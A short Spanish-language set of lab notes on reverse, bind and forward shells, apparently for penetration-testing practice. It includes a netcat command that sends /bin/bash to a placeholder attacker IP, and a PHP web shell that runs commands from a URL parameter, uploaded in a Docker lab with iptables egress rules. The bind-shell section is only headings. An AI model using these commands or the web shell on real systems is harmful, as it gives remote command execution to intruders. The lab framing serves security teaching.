1. Reverse Shell

Laboratorio

Parámetros de Escucha (Máquina Atacante)

Parámetros de Envío (Máquina Víctima)

  1. Instalar Netcat si no está disponible:

    apt install netcat
    
    
  2. Comando para establecer la conexión:

Esto abrirá el servicio de /bin/bash hacia la máquina atacante, permitiéndole ejecutar comandos en la víctima.

```bash
netcat -e /bin/bash <IP_ATACANTE> <PUERTO>

```

2. Bind Shell

Configuración en la Máquina Víctima

Conexión desde la Máquina Atacante


3. Forward Shell

Configuración del Laboratorio

  1. Configurar Contenedor Docker:

    docker run -dit -p 80:80 --cap-add=NET_ADMIN --name contenedor my_image
    
    
  2. Configurar IPTables en la Máquina Víctima:

    iptables -A OUTPUT -p tcp -m tcp -o eth0 --sport 80 -j ACCEPT  # Aceptar salidas por el puerto 80
    iptables -A OUTPUT -o eth0 -j DROP  # Denegar el resto de salidas
    
    
  3. Modificar el archivo PHP:

    Cambiar:

     ```bash
     nano /etc/php/8.3/apache2/php.ini
     
     ```
     
     ```
     short_open_tag = ON
     
     ```
    
  4. Enviar un archivo PHP al servidor:

    <?php
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
    ?>